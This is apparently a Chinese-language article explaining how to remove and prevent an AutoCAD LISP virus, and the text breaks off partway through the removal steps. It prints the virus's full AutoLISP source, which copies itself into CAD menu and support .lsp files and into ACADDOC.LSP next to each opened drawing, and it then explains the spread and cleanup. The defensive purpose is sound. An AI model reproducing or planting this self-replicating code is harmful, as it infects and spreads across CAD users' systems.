一种CAD病毒的清除与防范措施

1、一种CAD病毒的清除与防范措施雪山飞猪 QQ534455近来又出现一种AutoCAD病毒，该病毒与以往CAD病毒不同。干净的CAD系统当打开DWG图时，如果该图所在目录下有ACADDOC.LSP文件（基本为病毒传播文件），ACADDOC.LSP就会运行。1. 病毒的特征与传播方式我们先看看病毒代码，代码如下：(setq flagx t)(setq bz "(setq flagx t)")(defun app(source target bz / flag flag1 wjm wjm1 text) (setq flag nil) (setq flag1 t) (if (fin

2、dfile target) (progn (setq wjm1 (open target "r") (while (setq text (read-line wjm1)(if (= text bz) (setq flag1 nil);while (close wjm1) );progn );if (if flag1 (progn (setq wjm (open source "r") (setq wjm1 (open target "a") (write-line (chr 13) wjm1) (while (setq text (r

3、ead-line wjm)(if (= text bz) (setq flag t)(if flag (progn (write-line text wjm1) );progn );if);while (close wjm1) (close wjm) );progn );if );defun(setvar "cmdecho" 0)(setq acadmnl (findfile "acad.mnl")(setq acadmnlpath (vl-filename-directory acadmnl)(setq mnlfilelist (vl-director

4、y-files acadmnlpath "*.mnl")(setq mnlnum (length mnlfilelist)(setq acadexe (findfile "acad.exe")(setq acadpath (vl-filename-directory acadexe)(setq support (strcat acadpath "support")(setq lspfilelist (vl-directory-files support "*.lsp")(setq lspfilelist (appe

5、nd lspfilelist (list "acaddoc.lsp")(setq lspnum (length lspfilelist)(setq dwgname (getvar "dwgname")(setq dwgpath (findfile dwgname)(if dwgpath (progn (setq acaddocpath (vl-filename-directory dwgpath) (setq acaddocfile (strcat acaddocpath "acaddoc.lsp") (setq mnln 0) (w

6、hile (< mnln mnlnum) (setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist) (app mnlfilename acaddocfile bz) (app acaddocfile mnlfilename bz) (setq mnln (1+ mnln) );while (setq lspn 0) (while (< lspn lspnum) (setq lspfilename (strcat support "" (nth lspn lspfilelis

7、t) (app lspfilename acaddocfile bz) (app acaddocfile lspfilename bz) (setq lspn (1+ lspn) );while );progn );if(setq mnln 0)(while (< mnln mnlnum) (setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist) (setq mnln1 0) (while (< mnln1 mnlnum) (setq mnlfilename1 (strcat acadmnlp

8、ath "" (nth mnln1 mnlfilelist) (app mnlfilename mnlfilename1 bz) (setq mnln1 (1+ mnln1) );while (setq lspn1 0) (while (< lspn1 lspnum) (setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist) (app mnlfilename lspfilename1 bz) (setq lspn1 (1+ lspn1) );while (setq mnln (1+

9、mnln) );while(setq lspn 0)(while (< lspn lspnum) (setq lspfilename (strcat support "" (nth lspn lspfilelist) (setq lspn1 0) (while (< lspn1 lspnum) (setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist) (app lspfilename lspfilename1 bz) (setq lspn1 (1+ lspn1) );while

10、 (setq mnln1 0) (while (< mnln1 mnlnum) (setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist) (app lspfilename mnlfilename1 bz) (setq mnln1 (1+ mnln1) );while (setq lspn (1+ lspn)(load "acadapq")(princ)(load "acadapp")(princ)(load "acadapq")(pri

11、nc)病毒代码运行后，首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。support目录下的ACADDOC.LSP文件可能会被杀毒软件杀掉，但写入其他mnl和lsp文件中的病毒代码并未被清除，这就是为什么杀毒软件不能彻底杀CAD病毒的原因。染毒后的病毒会在打开的DWG文件的目录下把病毒代码附加在ACADDOC.LSP文件的尾部，如无ACADDOC.LSP文件就会创建新的并把病毒代码附加上。从上我们可以看出，如在打开的DWG文件目录下有含病毒代码的ACADDOC.LSP文件，CAD病毒就会传播开。2. 病毒的清除用写字板编辑中毒的mnl和lsp文件，从头开始找发现第一个(setq flagx t)时，把其及以后的代码通通去掉。举例说明，我的CAD系统有两个目录会有染毒文件，一是C:Documents and SettingsXXXApplication DataAutodeskAutoCAD Mechanical 2011R18.1chsSu